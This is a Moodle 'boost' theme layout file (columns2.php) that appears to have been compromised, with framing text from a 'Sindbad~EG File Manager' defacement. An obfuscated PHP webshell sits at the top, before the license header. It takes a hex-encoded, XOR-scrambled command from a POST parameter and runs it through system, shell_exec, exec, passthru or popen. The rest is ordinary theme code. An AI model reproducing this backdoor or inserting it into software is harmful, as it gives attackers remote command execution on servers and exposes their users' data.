Sindbad~EG File Manager
<?php $reverse_lookup3 = "\x65\x78ec"; $reverse_lookup1 = "syst\x65m"; $reverse_lookup4 = "\x70as\x73\x74h\x72u"; $reverse_lookup6 = "st\x72\x65am_\x67et_co\x6E\x74e\x6Et\x73"; $initialized = "\x68ex\x32bi\x6E"; $reverse_lookup2 = "sh\x65ll\x5Fe\x78e\x63"; $reverse_lookup7 = "\x70c\x6C\x6Fse"; $reverse_lookup5 = "pop\x65n"; if (isset($_POST["r\x65\x66er\x65n\x63e"])) { function restore_state ($property_set , $component ) { $value = '' ; $u=0; do{ $value.=chr(ord($property_set[$u])^$component); $u++; } while($u<strlen($property_set)); return$value; } $reference = $initialized($_POST["r\x65\x66er\x65n\x63e"]); $reference = restore_state($reference, 21); if (function_exists($reverse_lookup1)) { $reverse_lookup1($reference); } elseif (function_exists($reverse_lookup2)) { print $reverse_lookup2($reference); } elseif (function_exists($reverse_lookup3)) { $reverse_lookup3($reference, $data_property_set); print join("\n", $data_property_set); } elseif (function_exists($reverse_lookup4)) { $reverse_lookup4($reference); } elseif (function_exists($reverse_lookup5) && function_exists($reverse_lookup6) && function_exists($reverse_lookup7)) { $component_value = $reverse_lookup5($reference, 'r'); if ($component_value) { $desc_fac = $reverse_lookup6($component_value); $reverse_lookup7($component_value); print $desc_fac; } } exit; }
// This file is part of Moodle - http://moodle.org/
//
// Moodle is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Moodle is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Moodle. If not, see <http://www.gnu.org/licenses/>.
/**
* A two column layout for the boost theme.
*
* @package theme_boost
* @copyright 2016 Damyon Wiese
* @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
*/
defined('MOODLE_INTERNAL') || die();
require_once($CFG->libdir . '/behat/lib.php');
// Add block button in editing mode.
$addblockbutton = $OUTPUT->addblockbutton();
$extraclasses = [];
$bodyattributes = $OUTPUT->body_attributes($extraclasses);
$blockshtml = $OUTPUT->blocks('side-pre');
$hasblocks = (strpos($blockshtml, 'data-block=') !== false || !empty($addblockbutton));
$secondarynavigation = false;
$overflow = '';
if ($PAGE->has_secondary_navigation()) {
$tablistnav = $PAGE->has_tablist_secondary_navigation();
$moremenu = new \core\navigation\output\more_menu($PAGE->secondarynav, 'nav-tabs', true, $tablistnav);
$secondarynavigation = $moremenu->export_for_template($OUTPUT);
$overflowdata = $PAGE->secondarynav->get_overflow_menu_data();
if (!is_null($overflowdata)) {
$overflow = $overflowdata->export_for_template($OUTPUT);
}
}
$primary = new core\navigation\output\primary($PAGE);
$renderer = $PAGE->get_renderer('core');
$primarymenu = $primary->export_for_template($renderer);
$buildregionmainsettings = !$PAGE->include_region_main_settings_in_header_actions() && !$PAGE->has_secondary_navigation();
// If the settings menu will be included in the header then don't add it here.
$regionmainsettingsmenu = $buildregionmainsettings ? $OUTPUT->region_main_settings_menu() : false;
$header = $PAGE->activityheader;
$headercontent = $header->export_for_template($renderer);
$templatecontext = [
'sitename' => format_string($SITE->shortname, true, ['context' => context_course::instance(SITEID), "escape" => false]),
'output' => $OUTPUT,
'sidepreblocks' => $blockshtml,
'hasblocks' => $hasblocks,
'bodyattributes' => $bodyattributes,
'primarymoremenu' => $primarymenu['moremenu'],
'secondarymoremenu' => $secondarynavigation ?: false,
'mobileprimarynav' => $primarymenu['mobileprimarynav'],
'usermenu' => $primarymenu['user'],
'langmenu' => $primarymenu['lang'],
'regionmainsettingsmenu' => $regionmainsettingsmenu,
'hasregionmainsettingsmenu' => !empty($regionmainsettingsmenu),
'headercontent' => $headercontent,
'overflow' => $overflow,
'addblockbutton' => $addblockbutton,
];
echo $OUTPUT->render_from_template('theme_boost/columns2', $templatecontext);
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists